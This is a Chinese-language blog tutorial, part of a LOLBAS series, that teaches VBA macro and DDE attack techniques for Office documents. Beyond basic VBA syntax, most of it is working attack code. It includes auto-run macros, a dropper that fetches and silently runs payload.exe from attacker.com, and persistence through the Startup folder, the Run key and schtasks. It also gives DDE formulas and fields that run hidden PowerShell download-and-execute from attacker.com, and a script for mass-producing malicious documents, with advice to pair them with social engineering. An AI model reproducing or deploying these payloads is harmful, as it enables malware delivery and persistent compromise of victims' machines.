【LOLBAS鐵人賽Day29】附錄（三）：VBA 與 DDE - Office 文件攻擊技術

之前我們在 excel.exe 看到了 VBA 和 DDE 的攻擊手法，
但當時可能很快就將這兩個工具很快帶過，
今天我們就一起來深入看看他們的語法與應用吧！

p.s. 不過也先說，以下攻擊手法都只做為研究用途，
應該下面絕大多數都被 patch 掉了，
大家也可以在學會語法後，研究看看有沒有 bypass 的方法

一、基礎概念#

VBA (Visual Basic for Applications)#

Microsoft Office 內建的程式語言，用在自動化操作有完整系統存取權限，所以也是常見的惡意軟體載體

DDE (Dynamic Data Exchange)#

Windows 應用程式間的通訊協定，可以在 Office 文件中執行命令，不需啟用巨集

二、VBA 基礎語法#

開啟 VBA 編輯器#

Excel/Word 中按 Alt + F11
or 開發人員標籤 Visual Basic

先從 Hello VBA 開始吧#

1
Sub HelloWorld()
2
    MsgBox "Hello, VBA!"
3
End Sub

說明：

這是最簡單的 VBA 程式
在 VBA 編輯器中插入模組（Insert Module）
貼上程式碼後按 F5 執行
如果看到訊息框就表示 VBA 可以正常運作

變數與基本語法#

1
Sub BasicSyntax()
2
    ' 變數宣告
3
    Dim userName As String
4
    Dim userAge As Integer
5
    Dim salary As Double
6

7
    userName = "John"
8
    userAge = 30
9
    salary = 50000.5
10

11
    ' 顯示結果
12
    MsgBox "Name: " & userName & vbCrLf & _
13
           "Age: " & userAge & vbCrLf & _
14
           "Salary: " & salary
15

16
    ' 條件判斷
17
    If userAge >= 18 Then
18
        MsgBox "Adult"
19
    Else
20
        MsgBox "Not 18 yet"
21
    End If
22

23
    ' 迴圈
24
    Dim i As Integer
25
    Dim result As String
26
    result = ""
27
    For i = 1 To 5
28
        result = result & i & " "
29
    Next i
30
    MsgBox "Loop Result: " & result
31
End Sub

說明：

Dim 用來宣告變數
& 用來連接字串
vbCrLf 是換行符號
_ 可以把一行程式碼分成多行
這個程式會顯示三個訊息框，確認各個功能都正常

檔案操作#

1
Sub FileOperations()
2
    ' 設定檔案路徑（使用桌面以避免權限問題）
3
    Dim desktopPath As String
4
    Dim filePath As String
5

6
    desktopPath = CreateObject("WScript.Shell").SpecialFolders("Desktop")
7
    filePath = desktopPath & "\test_vba.txt"
8

9
    ' 寫入檔案
10
    Dim fileNum As Integer
11
    fileNum = FreeFile
12

13
    Open filePath For Output As #fileNum
14
    Print #fileNum, "testtesttest=========="
15
    Print #fileNum, "test2"
16
    Print #fileNum, "test3"
17
    Close #fileNum
18

19
    MsgBox "File Created at: " & filePath
20

21
    ' 讀取檔案
22
    Dim content As String
23
    Dim line As String
24
    content = ""
25

26
    fileNum = FreeFile
27
    Open filePath For Input As #fileNum
28
    Do While Not EOF(fileNum)
29
        Line Input #fileNum, line
30
        content = content & line & vbCrLf
31
    Loop
32
    Close #fileNum
33

34
    MsgBox "File content:" & vbCrLf & content
35
End Sub

說明：

使用桌面路徑避免權限問題
FreeFile 取得可用的檔案編號
Open...For Output 寫入模式（會覆蓋）
Open...For Input 讀取模式
EOF() 檢查是否到達檔案結尾
執行後會在桌面建立並讀取測試檔案

執行系統命令#

1
Sub RunCommand()
2
    ' 使用 Shell 執行簡單命令
3
    Dim result As Long
4
    result = Shell("notepad.exe", vbNormalFocus)
5

6
    MsgBox "Notepad opened already, Process ID: " & result
7
End Sub
8

9
Sub RunCommandAdvanced()
10
    ' 使用 WScript.Shell 執行命令
11
    Dim shell As Object
12
    Set shell = CreateObject("WScript.Shell")
13

14
    ' 執行 ipconfig 並顯示視窗
15
    shell.Run "cmd.exe /k ipconfig", 1, False
16

17
    MsgBox "Run ipconfig already"
18
End Sub
19

20
Sub GetEnvironmentInfo()
21
    ' 取得系統資訊
22
    Dim shell As Object
23
    Set shell = CreateObject("WScript.Shell")
24

25
    Dim info As String
26
    info = "Computer Name: " & shell.ExpandEnvironmentStrings("%COMPUTERNAME%") & vbCrLf
27
    info = info & "Username: " & shell.ExpandEnvironmentStrings("%USERNAME%") & vbCrLf
28
    info = info & "Temp dir: " & shell.ExpandEnvironmentStrings("%TEMP%")
29

30
    MsgBox info
31
End Sub

說明：

Shell 是最簡單的方式，可以開啟程式
vbNormalFocus 表示正常顯示視窗
CreateObject("WScript.Shell") 建立 Shell 物件
Run 的參數：命令視窗狀態是否等待
/k 讓 cmd 執行命令後保持開啟

網路操作#

1
Sub NetworkOperations()
2
    Dim http As Object
3
    Set http = CreateObject("MSXML2.XMLHTTP")
4

5
    ' 下載檔案
6
    http.Open "GET", "http://example.com/file.txt", False
7
    http.Send
8

9
    If http.Status = 200 Then
10
        Dim stream As Object
11
        Set stream = CreateObject("ADODB.Stream")
12
        stream.Type = 1  ' Binary
13
        stream.Open
14
        stream.Write http.responseBody
15
        stream.SaveToFile "C:\downloaded.txt", 2
16
        stream.Close
17
    End If
18

19
    ' POST 請求
20
    http.Open "POST", "http://example.com/api", False
21
    http.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
22
    http.Send "key=value"
23

24
    MsgBox http.responseText
25
End Sub

說明：

MSXML2.XMLHTTP 發送 HTTP 請求
Open 的第三個參數 False 表示同步（等待完成）
Status = 200 表示請求成功
ADODB.Stream 處理二進位資料
SaveToFile 的第二個參數：1=不覆寫，2=覆寫
可以用來下載 payload 或上傳竊取的資料

三、VBA 攻擊實作#

1. 自動執行巨集#

1
' Excel：在 ThisWorkbook 模組
2
Private Sub Workbook_Open()
3
    ExecutePayload
4
End Sub
5

6
' Word：在模組中
7
Sub AutoOpen()
8
    ExecutePayload
9
End Sub
10

11
Sub ExecutePayload()
12
    MsgBox "文件已開啟，巨集執行中"
13
    ' 就可以在這裡放 payload 了
14
End Sub

說明：

Workbook_Open 是 Excel 的開啟事件
AutoOpen 是 Word 的自動執行巨集
必須將 Excel 儲存為 .xlsm 格式（啟用巨集的活頁簿）
Word 儲存為 .docm 格式
使用者開啟文件並啟用巨集時就會自動執行（上面黃黃的那一條裡的按鈕）

2. 下載並執行 Payload#

1
Sub DownloadAndExecute()
2
    On Error Resume Next  ' 忽略錯誤
3

4
    Dim http As Object
5
    Dim stream As Object
6
    Dim shell As Object
7
    Dim url As String
8
    Dim savePath As String
9

10
    url = "http://attacker.com/payload.exe"
11
    savePath = Environ("TEMP") & "\update.exe"
12

13
    Set http = CreateObject("MSXML2.XMLHTTP")
14
    Set stream = CreateObject("ADODB.Stream")
15
    Set shell = CreateObject("WScript.Shell")
16

17
    ' 下載
18
    http.Open "GET", url, False
19
    http.Send
20

21
    If http.Status = 200 Then
22
        stream.Type = 1
23
        stream.Open
24
        stream.Write http.responseBody
25
        stream.SaveToFile savePath, 2
26
        stream.Close
27

28
        ' 執行
29
        shell.Run savePath, 0, False
30
    End If
31
End Sub

說明：

On Error Resume Next 讓程式碰到錯誤時繼續執行
Environ("TEMP") 取得暫存目錄，通常不會被注意
下載檔案後儲存到暫存目錄
shell.Run 的 0 表示隱藏視窗執行
False 表示不等待執行完成，立即返回
這是典型的 dropper 行為：下載並執行第二階段 payload

3. 資訊收集#

1
Sub CollectSystemInfo()
2
    On Error Resume Next
3

4
    Dim shell As Object
5
    Dim fso As Object
6
    Dim desktopPath As String
7
    Dim reportPath As String
8
    Dim fileNum As Integer
9

10
    Set shell = CreateObject("WScript.Shell")
11
    Set fso = CreateObject("Scripting.FileSystemObject")
12

13
    ' 設定報告路徑
14
    desktopPath = shell.SpecialFolders("Desktop")
15
    reportPath = desktopPath & "\system_report.txt"
16

17
    ' 建立報告檔案
18
    fileNum = FreeFile
19
    Open reportPath For Output As #fileNum
20

21
    ' 收集基本資訊
22
    Print #fileNum, "===== System Information Report ====="
23
    Print #fileNum, "Collection Time: " & Now
24
    Print #fileNum, ""
25
    Print #fileNum, "Computer Name: " & shell.ExpandEnvironmentStrings("%COMPUTERNAME%")
26
    Print #fileNum, "Username: " & shell.ExpandEnvironmentStrings("%USERNAME%")
27
    Print #fileNum, "User Domain: " & shell.ExpandEnvironmentStrings("%USERDOMAIN%")
28
    Print #fileNum, "Operating System: " & shell.ExpandEnvironmentStrings("%OS%")
29
    Print #fileNum, "Processor: " & shell.ExpandEnvironmentStrings("%PROCESSOR_IDENTIFIER%")
30
    Print #fileNum, "Number of Processors: " & shell.ExpandEnvironmentStrings("%NUMBER_OF_PROCESSORS%")
31
    Print #fileNum, "Temp Directory: " & shell.ExpandEnvironmentStrings("%TEMP%")
32
    Print #fileNum, ""
33

34
    ' Office 資訊
35
    Print #fileNum, "===== Office Information ====="
36
    Print #fileNum, "Application: " & Application.Name
37
    Print #fileNum, "Version: " & Application.Version
38
    Print #fileNum, "Document Path: " & ThisWorkbook.Path
39
    Print #fileNum, ""
40

41
    ' 磁碟資訊
42
    Print #fileNum, "===== Disk Information ====="
43
    Dim drive As Object
44
    For Each drive In fso.Drives
45
        If drive.IsReady Then
46
            Print #fileNum, "Drive " & drive.DriveLetter & ":"
47
            Print #fileNum, "  Type: " & drive.DriveType
48
            Print #fileNum, "  Total Size: " & Format(drive.TotalSize / 1024 / 1024 / 1024, "0.00") & " GB"
49
            Print #fileNum, "  Free Space: " & Format(drive.FreeSpace / 1024 / 1024 / 1024, "0.00") & " GB"
50
        End If
51
    Next drive
52

53
    Close #fileNum
54

55
    MsgBox "Report created at: " & reportPath, vbInformation
56

57
    ' 開啟報告檔案
58
    shell.Run "notepad.exe " & reportPath
59
End Sub

說明：

收集完整的系統資訊
使用 Print #fileNum 寫入檔案
Now 取得目前時間
Format 格式化數字（將位元組轉換為 GB）
報告會自動用記事本開啟
可以用來了解目標系統的環境

4. 持久化機制#

1
Sub CreatePersistence()
2
    Dim shell As Object
3
    Dim fso As Object
4

5
    Set shell = CreateObject("WScript.Shell")
6
    Set fso = CreateObject("Scripting.FileSystemObject")
7

8
    ' 方法一：複製到啟動資料夾
9
    Dim startupPath As String
10
    startupPath = shell.SpecialFolders("Startup")
11
    fso.CopyFile ThisWorkbook.FullName, startupPath & "\doc.xlsm", True
12

13
    ' 方法二：寫入註冊表
14
    On Error Resume Next
15
    shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Office", _
16
                   ThisWorkbook.FullName, "REG_SZ"
17

18
    ' 方法三：排程工作
19
    Dim taskCmd As String
20
    taskCmd = "schtasks /create /tn ""Update"" /tr """ & _
21
              ThisWorkbook.FullName & """ /sc daily /st 09:00 /f"
22
    shell.Run taskCmd, 0, True
23
End Sub

說明：

SpecialFolders("Startup") 取得啟動資料夾路徑
ThisWorkbook.FullName 取得目前文件的完整路徑
複製到啟動資料夾，每次開機會自動開啟
RegWrite 寫入註冊表的 Run 鍵，開機自動執行
schtasks 建立排程工作，定時執行
三種方法也都可以同時使用

四、DDE 攻擊技術#

Excel DDE#

在 Excel 儲存格中輸入以下公式：

1
=cmd|'/c powershell.exe -w hidden IEX(New-Object Net.WebClient).DownloadString("http://attacker.com/p.ps1")'!A1

或

1
=cmd|'\..\..\..\Windows\System32\cmd.exe /c calc.exe'!''

說明：

DDE 公式格式：=應用程式|'命令'!項目
cmd|'/c ...' 透過 cmd 執行命令
-w hidden 隱藏 PowerShell 視窗
IEX 是 Invoke-Expression，執行下載的腳本
\..\..\..\ 是路徑跳脫，繞過限制
不需要啟用巨集就能執行
p.s. 新版本已經 patch 掉了，可在舊版本上測試

Word DDE#

在 Word 中：

按 Ctrl + F9 插入欄位
輸入：

1
{ DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell.exe -w hidden $d='http://attacker.com/p.ps1';IEX(New-Object Net.WebClient).DownloadString($d)" }

說明：

{ } 是 Word 的欄位語法
DDEAUTO 自動更新欄位（自動執行）
/k 執行命令後保持視窗開啟（但我們用 hidden 隱藏了）
PowerShell 下載並執行遠端腳本
使用者開啟文件時會提示是否更新連結，點選是就會執行

使用 VBA 建立 DDE 文件#

1
Sub CreateDDEDocument()
2
    Dim doc As Document
3
    Set doc = Documents.Add
4

5
    ' 插入 DDE 欄位
6
    Dim fld As Field
7
    Set fld = doc.Fields.Add(Range:=Selection.Range, _
8
        Type:=wdFieldEmpty, _
9
        Text:="DDEAUTO c:\\windows\\system32\\cmd.exe ""/k calc.exe""", _
10
        PreserveFormatting:=True)
11

12
    fld.Update
13
    doc.SaveAs2 "C:\malicious.docx"
14
End Sub

說明：

用 VBA 自動建立包含 DDE 欄位的文件
wdFieldEmpty 表示空白欄位類型
Text 參數是 DDE 公式內容
可以批量製作惡意文件
適合用於針對性攻擊

五、總結#

VBA 核心技術#

自動執行：Workbook_OpenAutoOpen
系統操作：WScript.Shell
檔案操作：Scripting.FileSystemObject
網路功能：MSXML2.XMLHTTP

DDE 核心技術#

無需巨集：不需要啟用巨集
直接執行：透過公式執行命令
隱密性高：不容易被發現

注意事項#

Office 新版本已加強保護
預設會阻擋巨集執行
DDE 在新版中也被限制
記得要配合社交工程，才會有人願意點開 XD